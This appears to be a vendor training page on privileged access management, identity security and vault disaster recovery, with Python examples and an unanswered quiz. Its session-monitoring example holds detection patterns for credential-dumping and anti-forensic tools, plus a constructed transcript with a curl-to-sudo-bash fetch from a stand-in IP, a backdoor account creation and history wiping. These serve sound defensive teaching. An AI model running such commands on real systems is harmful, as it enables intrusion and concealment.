Privileged Access Management
PAM controls, monitors, and audits privileged accounts (those with elevated permissions to critical systems) to limit the damage an insider or an external attacker can do with them.
- 74% of breaches involve privileged access misuse
- $4.9M average cost of a data breach (2024)
- 80% breach reduction with mature PAM programs
- 90% of organizations have unmanaged privileged accounts
Core PAM Concepts
Least Privilege Principle
Users, processes, and applications receive only the minimum access rights needed to perform their function, so a compromised credential yields a correspondingly small blast radius.
CORE PRINCIPLE
Credential Vaulting
Privileged credentials are stored in an encrypted vault and removed from desktops, spreadsheets, and shared drives. Automated rotation makes any copy that leaks outside the vault stale.
VAULT TECHNOLOGY
Session Management & Recording
All privileged sessions are monitored, logged, and optionally recorded in full. Enables real-time intervention, forensic audit trails, and regulatory compliance.
AUDIT & COMPLIANCE
Just-in-Time Access (JIT)
Privileges are granted on demand for a limited time window and then revoked automatically. This removes standing admin accounts, one of the most exploited attack vectors.
ZERO STANDING PRIVILEGE
Automated Credential Rotation
Passwords and secrets rotate automatically on a scheduled basis or after use, ensuring credentials never become persistent targets for attackers or insider threats.
AUTOMATION
Privileged Account Discovery
Continuously scans the environment for privileged accounts, including orphaned, shared, and service accounts, and brings shadow IT under controlled governance.
DISCOVERY
Common Privileged Access Threats
| Threat Vector | Description | Risk Level | PAM Mitigation |
|---|---|---|---|
| Credential Theft | Attackers obtain admin passwords via phishing, keyloggers, infostealers, or purchase of leaked credentials | CRITICAL | Vaulting plus MFA and rotation removes long-lived static passwords |
| Lateral Movement | A compromised low-privilege account is used to reach other hosts and escalate privileges across the network | CRITICAL | Least privilege limits what a compromised account can reach and cuts the escalation paths |
| Insider Threats | Malicious or negligent employees abuse privileged access to exfiltrate data | HIGH | Session recording and behavioral analytics surface anomalous privileged activity |
| Third-Party Vendor Risk | Contractors or MSPs hold broad access that persists beyond the engagement | HIGH | JIT access grants temporary, scoped privileges and expires them automatically |
| Service Account Sprawl | Unmanaged machine-to-machine credentials embedded in scripts and applications | MEDIUM | Secrets manager discovers, vaults, and rotates service account credentials |
| Pass-the-Hash Attacks | Attackers reuse captured NTLM password hashes to authenticate without knowing the plaintext | CRITICAL | Per-use rotation invalidates captured hashes; unique passwords per system stop one hash from unlocking many hosts |
PAM Architecture Overview
How PAM Works: Request-to-Access Flow
1. User / App: requests access
2. PAM Policy Engine: evaluates the request
3. Credential Vault: issues a time-limited credential
4. Target System: grants access
5. Session Recorder: logs all activity
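The request-to-access flow above, and the check-out / check-in rotation described under the best practices, as an added example in Python. This is not Delinea's code or API; the policy table, group names, targets, lease lengths and field names are hypothetical. It shows the decisions a policy engine has to make before the vault issues anything, that the issued credential is bound to a lease window, that the audit trail records a fingerprint of the credential rather than the credential, and that check-in rotates the secret so the issued copy is single-use.

```python
import hashlib
import secrets
from dataclasses import dataclass

# Hypothetical policy table: target -> (groups entitled to request it, maximum lease in seconds)
POLICY = {
    "db-prod-01": ({"dba", "sre"}, 3600),
    "dc-01": ({"domain-admins"}, 900),
}


@dataclass(frozen=True)
class AccessRequest:
    user: str
    groups: frozenset
    target: str
    mfa_verified: bool   # asserted by the IdP for this checkout, not an hours-old login
    justification: str   # change ticket or reason; required so the audit trail is reviewable
    ttl_s: int           # lease the requester asks for


def evaluate(req):
    """Policy engine: return 'allow' or a distinct deny reason, so audit entries are actionable."""
    rule = POLICY.get(req.target)
    if rule is None:
        return "deny:unknown-target"
    allowed, max_ttl = rule
    if not (req.groups & allowed):
        return "deny:not-entitled"
    if not req.mfa_verified:
        return "deny:mfa-required"
    if not req.justification.strip():
        return "deny:justification-required"
    if not 0 < req.ttl_s <= max_ttl:
        return f"deny:ttl-outside-0..{max_ttl}s"
    return "allow"


class Vault:
    def __init__(self):
        self._secrets = {t: secrets.token_urlsafe(32) for t in POLICY}
        self._leases = {}   # lease id -> (target, expires_at)
        self.audit = []     # append-only; never holds a secret, only a fingerprint

    def _log(self, now, req, event, detail, lease=None):
        self.audit.append({"ts": now, "user": req.user, "target": req.target,
                           "event": event, "detail": detail, "lease": lease})

    def checkout(self, req, now):
        decision = evaluate(req)
        if decision != "allow":
            self._log(now, req, "checkout", decision)
            return None
        lease = secrets.token_hex(8)
        expires = now + req.ttl_s
        self._leases[lease] = (req.target, expires)
        secret = self._secrets[req.target]
        fp = hashlib.sha256(secret.encode()).hexdigest()[:12]
        self._log(now, req, "checkout", f"allow ttl={req.ttl_s}s cred_fp={fp}", lease)
        return lease, secret, expires

    def lease_valid(self, lease, now):
        entry = self._leases.get(lease)
        return entry is not None and now < entry[1]

    def checkin(self, req, lease, now):
        """Close the lease and rotate the target's secret so the issued copy is single-use."""
        target, _ = self._leases.pop(lease)
        self._secrets[target] = secrets.token_urlsafe(32)
        self._log(now, req, "checkin", "rotated", lease)


def demo():
    """Walk one requester through deny, allow, expiry and rotation; returns the observed outcomes."""
    vault = Vault()
    t0 = 1_700_000_000
    dba = frozenset({"dba"})
    ok = AccessRequest("jdoe", dba, "db-prod-01", True, "CHG-4711 index rebuild", 1800)
    no_mfa = AccessRequest("jdoe", dba, "db-prod-01", False, "CHG-4711", 1800)
    too_long = AccessRequest("jdoe", frozenset({"domain-admins"}), "dc-01", True, "CHG-4712", 1800)

    denied_mfa = vault.checkout(no_mfa, t0) is None
    denied_ttl = vault.checkout(too_long, t0) is None
    lease, cred1, expires = vault.checkout(ok, t0)
    valid_during = vault.lease_valid(lease, t0 + 600)
    invalid_after = not vault.lease_valid(lease, expires)   # lease ends exactly at expiry
    vault.checkin(ok, lease, t0 + 700)
    _, cred2, _ = vault.checkout(ok, t0 + 800)
    return {
        "denied_without_mfa": denied_mfa,
        "denied_ttl_over_max": denied_ttl,
        "valid_during_lease": valid_during,
        "invalid_after_expiry": invalid_after,
        "rotated_on_checkin": cred1 != cred2,
        "secret_in_audit": any(cred1 in str(e) or cred2 in str(e) for e in vault.audit),
        "audit_events": [e["event"] + ":" + e["detail"].split()[0] for e in vault.audit],
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The point of keeping the fingerprint rather than the value in the audit log is that the log is forwarded to a SIEM and read by many people; it must be able to prove which credential version was issued without itself becoming a credential store.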
PAM Best Practices
Build a Privilege Discovery Foundation
STEP 1
Before implementing controls, you must know what you have. Run a full discovery scan across Active Directory, LDAP, local admin accounts, cloud IAM, service accounts, and application credentials.
- Inventory all privileged accounts โ including dormant and orphaned accounts
- Map service accounts to their owning applications and business processes
- Identify accounts that share passwords across systems (a critical risk)
- Establish a baseline of "normal" privileged usage patterns for anomaly detection
- Categorize accounts by risk tier to prioritize remediation efforts
Enforce Credential Vaulting & Rotation
STEP 2
Move all privileged credentials into a centralized, encrypted vault. Eliminate hardcoded credentials in scripts, config files, and shared spreadsheets.
- Enforce password complexity and uniqueness per system
- Configure automated rotation, at least every 30 to 90 days, or after every use for highly sensitive systems
- Use check-out / check-in workflows: credentials are only issued for the duration of a session
- Enable emergency break-glass access with mandatory audit triggers
- Integrate vault with CI/CD pipelines to eliminate secrets in code repositories
Implement Multi-Factor Authentication
STEP 3
MFA is non-negotiable for all privileged access. A stolen password alone should never be sufficient to access critical systems.
- Require MFA at vault login and for each privileged session checkout
- Use phishing-resistant factors: hardware tokens (FIDO2/WebAuthn), certificate-based auth
- Apply step-up authentication for high-risk operations like domain admin access
- Integrate with your identity provider (Okta, Microsoft Entra ID, formerly Azure AD, or Ping) for unified MFA policies
- Do not rely on SMS one-time codes for privileged access; they are phishable and exposed to SIM swapping
Monitor, Record & Audit All Sessions
STEP 4
Every privileged session should be visible to your security team. Session recording is both a deterrent and a forensic tool.
- Record all RDP, SSH, and web console sessions as full session video plus keystroke and command transcripts; the transcript is what makes sessions searchable and alertable
- Implement real-time session monitoring with alerts for suspicious commands
- Enable automated session termination when policy violations are detected
- Forward session logs to your SIEM for correlation with other security events
- Retain session recordings for audit and compliance (often 12 to 24 months minimum)
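The real-time monitoring and automatic termination described in step 4, as an added example in Python; it is not Delinea's code. The transcript line format, the detection rules and the severity policy are hypothetical, and the transcript lines are constructed for this example. Rules flag credential dumping tools, piping a downloaded script into a shell, creating local accounts, editing sudoers and anti-forensic commands; any critical hit marks the session for termination.

```python
import re

# Hypothetical detection rules applied to the command field: (name, severity, pattern)
RULES = [
    ("credential-dumping", "critical",
     re.compile(r"\b(mimikatz|secretsdump|procdump|lsass)\b", re.I)),
    ("anti-forensics", "critical",
     re.compile(r"\bhistory\s+-c\b|\bunset\s+HISTFILE\b|\bauditctl\s+-e\s*0\b"
                r"|\bsystemctl\s+(stop|disable)\s+auditd\b", re.I)),
    ("remote-script-pipe", "high",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b", re.I)),
    ("local-account-added", "high",
     re.compile(r"\buseradd\b|\bnet\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("sudoers-edit", "high",
     re.compile(r"\bvisudo\b|/etc/sudoers", re.I)),
]

# Hypothetical one-command-per-line transcript format written by the session recorder
LINE = re.compile(r'^(?P<ts>\S+)\s+sess=(?P<sess>\S+)\s+user=(?P<user>\S+)'
                  r'\s+host=(?P<host>\S+)\s+cmd="(?P<cmd>.*)"$')


def parse_line(line):
    m = LINE.match(line)
    return m.groupdict() if m else None


def scan_session(lines):
    """Return (alerts, sessions_to_terminate). A critical hit marks its session for termination."""
    alerts, terminate = [], set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # malformed line; in production a gap in the recorder feed is itself an alert
        for name, severity, pattern in RULES:
            if pattern.search(rec["cmd"]):
                alerts.append({"ts": rec["ts"], "sess": rec["sess"], "user": rec["user"],
                               "host": rec["host"], "rule": name, "severity": severity,
                               "cmd": rec["cmd"]})
                if severity == "critical":
                    terminate.add(rec["sess"])
    return alerts, terminate


# Constructed sample transcript: one benign admin session that turns hostile, one benign AD query
SAMPLE_TRANSCRIPT = [
    '2024-05-02T10:01:03Z sess=7f2a user=jdoe host=db-prod-01 cmd="ls -la /var/lib/pgsql"',
    '2024-05-02T10:01:40Z sess=7f2a user=jdoe host=db-prod-01 cmd="sudo systemctl restart postgresql"',
    '2024-05-02T10:02:11Z sess=7f2a user=jdoe host=db-prod-01 cmd="curl -s http://203.0.113.9/x.sh | sudo bash"',
    '2024-05-02T10:02:30Z sess=7f2a user=jdoe host=db-prod-01 cmd="useradd -m -G wheel svc_backup2"',
    '2024-05-02T10:02:45Z sess=7f2a user=jdoe host=db-prod-01 cmd="history -c && unset HISTFILE"',
    '2024-05-02T10:03:02Z sess=9c1d user=msmith host=dc-01 cmd="Get-ADUser -Filter * | Measure-Object"',
]

if __name__ == "__main__":
    found, kill = scan_session(SAMPLE_TRANSCRIPT)
    for a in found:
        print(f"{a['ts']} [{a['severity']}] {a['rule']} sess={a['sess']} user={a['user']}: {a['cmd']}")
    print("terminate sessions:", sorted(kill))
```

On the sample the session 7f2a produces three alerts (remote script pipe, local account added, anti-forensics) and is marked for termination by the anti-forensics hit; the earlier `ls` and `systemctl restart` lines are what a normal session looks like and stay silent. Regex rules of this kind are a floor, not a ceiling: the same feed should also go to the SIEM so the commands can be correlated with the checkout that issued the credential.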
Compliance Note: PAM capabilities are mandated or strongly recommended by PCI DSS, SOX, HIPAA, NIST SP 800-53, ISO 27001, and most cyber insurance underwriters. A robust PAM program reduces audit scope and can lower premiums.
Identity Security
Identity has become the new security perimeter. Every user, device, workload, and service that accesses your environment must be treated as a potential attack vector and verified accordingly.
The Perimeter is Dead. Traditional network-based security assumed internal users were trusted. In modern cloud, hybrid, and remote environments, identity is the only consistent control plane. Every access request must be authenticated, authorized, and continuously verified.
Zero Trust Identity Architecture
Never Trust, Always Verify
No user or device is inherently trusted based on network location. Every access request must be authenticated and authorized in context, regardless of whether it originates inside or outside the perimeter.
ZERO TRUST
Continuous Verification
Authentication is not a one-time event at login. Continuous behavioral analytics and risk signals re-evaluate trust throughout a session, triggering step-up auth when anomalies are detected.
ADAPTIVE AUTH
Non-Human Identities (NHIs)
Service accounts, API keys, certificates, and CI/CD pipelines now make up the majority of identities in most environments. NHIs are often over-privileged, long-lived, and poorly managed, which makes them a growing attack surface.
MACHINE IDENTITY
Federated Identity & SSO
Single Sign-On with federated identity standards (SAML, OIDC, OAuth2) reduces password sprawl and provides a central enforcement point for MFA and conditional access policies.
FEDERATION
Identity Governance & IGA
IGA solutions manage the full identity lifecycle โ provisioning, role management, access certifications, and deprovisioning. Ensures access is appropriate and revoked promptly when no longer needed.
GOVERNANCE
Privileged Identity Management
PIM extends PAM to cloud-native environments, governing Microsoft Entra ID (formerly Azure AD) privileged roles, AWS IAM, and GCP service accounts with the same rigor applied to on-premises admin accounts.
CLOUD IAM
The Identity Attack Surface
Shadow IT & Rogue Accounts
Employees create accounts in SaaS tools, cloud platforms, and development environments outside of IT oversight. These shadow accounts carry full risk but zero visibility.
- Use Cloud Access Security Brokers (CASB) to discover unsanctioned cloud usage
- Integrate identity discovery with HR systems to catch joiners/movers/leavers automatically
- Enforce SSO as a pre-condition for new SaaS tool approvals
- Conduct quarterly access reviews and user access certifications
API Keys & Secret Sprawl
Developers embed API keys, database passwords, and tokens directly in source code, environment files, and configuration repositories. These secrets proliferate rapidly and are rarely rotated.
- Scan code repositories (GitHub, GitLab, Bitbucket) continuously for exposed secrets
- Implement a Secrets Manager as the authoritative source for all application credentials
- Block commits containing secrets with pre-commit hooks and CI/CD scanning
- Enforce dynamic secrets that expire after use for database and cloud credentials
- Audit access to secrets vaults and alert on unusual retrieval patterns
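The repository scanning and pre-commit blocking in the list above, as an added example in Python. This is not the page's or any vendor's scanner; the rule set, the threshold and the hook wiring are assumptions, and the sample file content is constructed (AKIAIOSFODNN7EXAMPLE is the placeholder access key id used in AWS documentation, not a live key). Two kinds of rule are combined: fixed patterns for credential formats that are recognizable on sight, and a generic rule for `password=`/`token=`-style assignments whose value has high Shannon entropy, which lets obvious placeholders through while catching real-looking literals.

```python
import math
import re
from collections import Counter


def shannon_entropy(s):
    """Bits per character; a 24-character random token scores about 4.5, 'xxxxxxxx' scores 0."""
    counts, n = Counter(s), len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


# Fixed-format credentials: (rule name, pattern)
PATTERN_RULES = [
    ("aws-access-key-id", re.compile(r"\b(AKIA|ASIA)[0-9A-Z]{16}\b")),
    ("private-key-block", re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----")),
    ("github-token", re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36,}\b")),
]

# Generic rule: a secret-looking variable assigned a quoted literal of 16+ characters
ASSIGNMENT = re.compile(
    r"""(?i)\b\w*(password|passwd|pwd|secret|token|api[_-]?key)\b\s*[:=]\s*["']([^"']{16,})["']""")
ENTROPY_THRESHOLD = 3.5   # assumption; tune against your own false-positive rate


def redact(value):
    """Show enough to locate the finding without re-leaking the value into CI logs."""
    return f"{value[:4]}...({len(value)} chars)"


def scan_text(text, path="<stdin>"):
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        hit = False
        for name, pattern in PATTERN_RULES:
            m = pattern.search(line)
            if m:
                findings.append({"path": path, "line": lineno, "rule": name, "match": redact(m.group(0))})
                hit = True
        if hit:
            continue   # a fixed-format hit already explains the line; avoid double reporting
        m = ASSIGNMENT.search(line)
        if m:
            value = m.group(2)
            ent = shannon_entropy(value)
            if ent >= ENTROPY_THRESHOLD:
                findings.append({"path": path, "line": lineno, "rule": "high-entropy-assignment",
                                 "match": redact(value), "entropy": round(ent, 2)})
    return findings


def precommit_check(staged_text, path="<staged>"):
    """Exit status for a pre-commit hook: 1 blocks the commit."""
    findings = scan_text(staged_text, path)
    for f in findings:
        print(f"{f['path']}:{f['line']}: {f['rule']} {f['match']}")
    return 1 if findings else 0


# Constructed sample of a settings file; none of these values are real credentials
SAMPLE = """\
# settings.py (constructed sample, not a real config)
import os
password = os.environ["DB_PASSWORD"]
API_KEY = "xxxxxxxxxxxxxxxxxxxxxxxx"
SMTP_TOKEN = "Xk9mQ2pL7vR4nT8wZ1yB3cF6"
AWS_KEY = "AKIAIOSFODNN7EXAMPLE"
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA
"""

if __name__ == "__main__":
    raise SystemExit(precommit_check(SAMPLE, "settings.py"))
```

On the sample the environment lookup and the `xxxx` placeholder pass, while the random-looking SMTP token, the AWS key id and the private key header are reported and the exit status is 1. To wire it as a hook, feed it the output of `git diff --cached` (or each staged file) from `.git/hooks/pre-commit`; the same function can run in CI as a second gate for pushes that bypass local hooks.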
Third-Party & Supply Chain Identity Risk
Vendors, contractors, and software supply chains represent a significant and growing identity risk. The SolarWinds and Okta breaches showed how a third-party identity compromise cascades into customers.
- Enforce vendor access through a privileged remote access solution, never VPN or direct credentials
- Apply strict JIT access: vendor accounts are activated only during maintenance windows
- Require MFA for all third-party identities with no exceptions
- Monitor and record all vendor sessions in real time
- Periodically review and certify all third-party access entitlements
Workload & Machine Identity Security
Containers, microservices, serverless functions, and CI/CD pipelines all need identities. These non-human identities outnumber human ones by 45:1 in many enterprises and are often completely unmanaged.
- Issue short-lived X.509 certificates to workloads via an internal PKI or SPIFFE/SPIRE
- Use IAM roles (not static access keys) for cloud workload authentication
- Rotate secrets used by pipelines at every run; never cache credentials across jobs
- Apply network policies to limit lateral movement between workloads
- Decommission orphaned service accounts when workloads are retired
Identity Security Maturity Model
LEVEL 1
Reactive
Passwords managed manually. No MFA enforcement. Privileged accounts shared. Breaches discovered after-the-fact through external notification.
LEVEL 2
Managed
Centralized directory. Basic PAM deployed for some systems. MFA for remote access. Quarterly access reviews. Incident response plans exist.
LEVEL 3
Proactive
Full vault coverage. JIT access deployed. Session recording active. IGA integrated with HR. SIEM correlated with PAM events. Automated deprovisioning.
LEVEL 4
Optimized
Zero Standing Privilege enforced. Adaptive MFA with behavioral analytics. NHI identity lifecycle fully automated. Continuous compliance dashboards. Secrets managed with DR protection.
Delinea's Role: Delinea's platform, including Secret Server, Privilege Manager, and DevOps Secrets Vault, provides the technical controls to advance your organization from Level 1 to Level 4, with Resilient Secrets ensuring your identity security posture remains intact even during disasters.
Resilient Secrets & Disaster Recovery
Delinea Resilient Secrets delivers enterprise-grade high availability, geographic redundancy, and automated failover for your secrets management infrastructure, so a disaster never becomes a security crisis.
The DR Problem Resilient Secrets Solves
Without Resilient Secrets
- Vault outage = all privileged access halted, operations grind to a stop
- Single point of failure in your most critical security control
- Manual recovery from backup takes hours or days
- Risk of credential loss and data integrity issues during restore
- Ransomware can encrypt vault database, blocking all credential access
- DR testing is complex, disruptive, and rarely performed
- RTO measured in hours; RPO potentially hours of data loss
With Resilient Secrets
- Automatic failover to a hot standby, transparent to end users
- Active-passive or active-active replication across sites/regions
- Recovery in seconds to minutes, not hours
- Synchronous or asynchronous replication preserves data integrity
- Immutable backup snapshots protect against ransomware encryption
- Non-disruptive DR testing validates recoverability at any time
- RTO measured in seconds; near-zero RPO with synchronous replication
Key Features & Capabilities
Automated Failover
When the primary node becomes unavailable, Resilient Secrets automatically promotes the standby node without manual intervention. Vault operations resume on the standby with at most a brief connection reset for in-flight sessions, and privileged access workflows continue.
HIGH AVAILABILITY
Geographic Redundancy
Deploy standby nodes in separate data centers, availability zones, or cloud regions. Protects against site-level failures including natural disasters, power outages, and regional cloud provider incidents.
GEO REDUNDANCY
Real-Time Replication
All vault writes (new secrets, rotations, access policy changes) are replicated to standby nodes in real time. Synchronous replication gives zero data loss (RPO = 0) because a write is acknowledged only after the standby has applied it; the cost is added write latency, which is why asynchronous replication is often chosen across long distances at the price of a small RPO.
REPLICATION
Non-Disruptive DR Testing
Organizations can test their disaster recovery plan without impacting production operations. Snapshot-based testing environments allow teams to validate recovery procedures on a regular cadence with confidence.
DR TESTING
Immutable Snapshot Backups
Point-in-time snapshots of the vault database are stored in immutable storage, protecting against ransomware, accidental deletion, and data corruption. Granular restore allows recovery to a precise moment in time.
RANSOMWARE PROTECTION
Health Monitoring & Alerting
Continuous health checks monitor replication lag, node availability, and certificate validity. Automated alerts notify operations teams of degraded redundancy before a failure event occurs.
OBSERVABILITY
Disaster Recovery Deployment Models
Active-Passive (Hot Standby)
MOST COMMON
Architecture: One primary node handles all read/write operations. One or more passive standby nodes receive continuous replication and are ready to take over instantly.
- Failover is automatic, triggered by health check failure on the primary node
- Standby node is fully synchronized and operational within seconds of promotion
- Suitable for most enterprise deployments with a secondary data center or cloud region
- Lower infrastructure cost than active-active while providing near-zero RTO
- Supports planned failover for maintenance windows with zero user impact
Active-Active (Multi-Primary)
HIGHEST AVAILABILITY
Architecture: Multiple nodes handle read and write operations simultaneously. Traffic is load-balanced across all nodes. Any node failure is transparent to users.
- Zero single point of failure: the cluster continues operating even if multiple nodes fail
- Load distribution improves performance under high-concurrency workloads
- Ideal for global enterprises requiring vault access across multiple geographic regions
- Supports zero-downtime upgrades via rolling node updates
- Requires careful conflict resolution for concurrent writes; Delinea manages this automatically
Cloud-Native Resilience
CLOUD DEPLOYMENTS
Architecture: Delinea's cloud-hosted Secret Server leverages native cloud HA capabilities โ multi-AZ deployments on AWS, Azure, or GCP with managed database replication.
- Leverage cloud-provider SLAs for 99.99% availability at the infrastructure layer
- Automatic database failover with AWS RDS Multi-AZ or Azure SQL HA
- Storage replication across availability zones for vault data and encryption keys
- Kubernetes-native deployments with pod anti-affinity rules prevent co-location failures
- Cross-region replication for enterprise-class geographic DR with single-pane management
How Disaster Recovery Works: Step by Step
1. Continuous Replication & Health Monitoring
All vault writes are replicated synchronously or asynchronously to standby nodes. Health check agents poll primary node availability every few seconds. Replication lag is monitored and alerted if thresholds are exceeded.
2. Failure Detection
When the primary node fails health checks (unresponsive, network partition, hardware failure), the cluster management layer waits a configurable number of consecutive failures before deciding to fail over, so a transient blip does not cause a flap. The timeout alone does not rule out split-brain: the demoted primary, which may still be running on the far side of a partition, must also be fenced so it can no longer accept writes before the standby is promoted.
3. Automatic Standby Promotion
The most current standby node is automatically promoted to primary. The node applies any pending replication transactions to reach a consistent state, then begins accepting read/write operations. This process typically completes in under 30 seconds.
4. DNS / Load Balancer Cutover
The vault endpoint DNS record or load balancer target is updated to point to the newly promoted primary node. Client connections are transparently rerouted. Users experience a brief connection reset but do not need to change configuration or re-authenticate.
5. Operations Continue
All credential checkouts, rotations, session launches, and API calls resume normally on the new primary node. Security teams are alerted to the failover event with full details for incident tracking and post-mortem analysis.
6. Recovery & Rebalancing
Once the original primary node is repaired, it re-joins the cluster as a standby node, resyncs with the current primary, and restores full redundancy. Operations teams can optionally fail back to the original node during a maintenance window.
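The six steps above, as an added example in Python that is not Delinea's code. It models one primary with a synchronous and an asynchronous standby, a health checker that fails over only after a threshold of consecutive misses, promotion of the most current standby, and a cluster epoch that fences the old primary: a partitioned primary that still believes it is primary presents a stale epoch and its writes are rejected. Node names, the epoch mechanism and the write API are hypothetical; real products enforce the fence through shared storage, a lease, or clients that carry the current epoch. The example also goes slightly beyond the text by showing the RPO difference between the two replica types: an entry not yet shipped to the asynchronous replica dies with the primary.

```python
from dataclasses import dataclass, field


@dataclass
class Node:
    name: str
    role: str = "standby"
    sync: bool = True        # True: a write is acknowledged only after this replica applied it
    reachable: bool = True   # what the health checker sees; a partitioned node may still be running
    epoch: int = 0           # cluster epoch this node last accepted
    log: list = field(default_factory=list)   # applied entries as (lsn, key, value)

    @property
    def lsn(self):
        return self.log[-1][0] if self.log else 0


class VaultCluster:
    def __init__(self, primary, standbys, failure_threshold=3):
        self.epoch = 1
        primary.role, primary.epoch = "primary", self.epoch
        self.primary, self.standbys = primary, list(standbys)
        self.failure_threshold, self.failures = failure_threshold, 0
        self.async_backlog = []   # entries not yet shipped to asynchronous replicas
        self.events = []

    def write(self, via, key, value):
        """Accept a write only from the node holding the current epoch; anything else is fenced."""
        if via.role != "primary" or via.epoch != self.epoch:
            self.events.append(f"rejected write via {via.name}: epoch {via.epoch} != {self.epoch}")
            return False
        entry = (via.lsn + 1, key, value)
        via.log.append(entry)
        for s in self.standbys:
            if s.sync:
                s.log.append(entry)        # synchronous replica: this entry can never be lost
        self.async_backlog.append(entry)   # asynchronous replicas receive it on the next shipment
        return True

    def ship_async(self):
        for s in self.standbys:
            if not s.sync:
                s.log.extend(self.async_backlog)
        self.async_backlog.clear()

    def health_check(self):
        """One poll. Fail over only after `failure_threshold` consecutive misses."""
        if self.primary.reachable:
            self.failures = 0
            return None
        self.failures += 1
        return self.failover() if self.failures >= self.failure_threshold else None

    def failover(self):
        if not self.standbys:
            raise RuntimeError("no standby available")
        old = self.primary
        new = max(self.standbys, key=lambda n: n.lsn)   # most current standby wins
        self.async_backlog.clear()                       # unshipped entries died with the old primary
        self.epoch += 1                                  # the old primary's epoch is now stale (fenced)
        new.role, new.epoch = "primary", self.epoch
        self.standbys = [s for s in self.standbys if s is not new]
        for s in self.standbys:
            s.log = list(new.log)                        # remaining standbys resync from the new primary
        self.primary, self.failures = new, 0
        self.events.append(f"failover {old.name}->{new.name} epoch={self.epoch} lsn={new.lsn}")
        return new

    def rejoin(self, node):
        """Repaired node returns as a standby, resyncs, and restores redundancy."""
        node.role, node.epoch, node.reachable = "standby", self.epoch, True
        node.log = list(self.primary.log)
        self.standbys.append(node)


def demo():
    a, b, c = Node("vault-a"), Node("vault-b", sync=True), Node("vault-c", sync=False)
    cluster = VaultCluster(a, [b, c])
    cluster.write(a, "db-prod-01/admin", "v1")
    cluster.ship_async()                               # vault-c now has lsn 1
    cluster.write(a, "db-prod-01/admin", "v2")         # vault-b has it (sync); vault-c does not yet
    a.reachable = False                                # partition: vault-a keeps running and still thinks it is primary
    promoted = [cluster.health_check() for _ in range(3)]
    fenced = not cluster.write(a, "dc-01/admin", "late")    # stale epoch: rejected
    cluster.write(cluster.primary, "dc-01/admin", "v1")     # operations continue on the new primary
    cluster.rejoin(a)
    return cluster, promoted, fenced


if __name__ == "__main__":
    cl, _, _ = demo()
    print("\n".join(cl.events))
    print("primary:", cl.primary.name, "epoch:", cl.epoch, "standbys:", [n.name for n in cl.standbys])
```

In the run, vault-b is promoted because it is at lsn 2 while the asynchronous vault-c is still at lsn 1; had vault-b not existed, the second write would have been lost, which is exactly the RPO that synchronous replication buys down to zero. The late write through vault-a is rejected even though vault-a still calls itself primary, which is the split-brain case the epoch exists to close.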
Benefits Summary
- <30s automatic failover RTO
- ~0 data loss (RPO) with synchronous replication
- 99.99% target vault availability SLA
- 100% transparent failover, no user action required
Why This Matters for Security: Your PAM vault is the master key to your entire privileged access infrastructure. If the vault is unavailable, even for minutes, privileged users may resort to hardcoded credentials, shared passwords, or bypassing controls entirely. Resilient Secrets ensures your security controls remain intact during every type of failure event.
Knowledge Check
Test your understanding of PAM, Identity Security, and Delinea Resilient Secrets.
PAM & Identity Security Assessment
1. What is the primary principle that PAM enforces to minimize the impact of compromised credentials?
2. Just-in-Time (JIT) access is designed to eliminate which major security risk?
3. In a Zero Trust security model, what is the correct stance toward users accessing resources from inside the corporate network?
4. Non-Human Identities (NHIs) refer to which of the following?
5. What does Delinea Resilient Secrets primarily protect against?
6. In Active-Passive replication, what happens when the primary vault node fails?
7. Which of the following BEST describes RPO (Recovery Point Objective)?
8. Why is vault availability critical specifically from a security perspective during a disaster?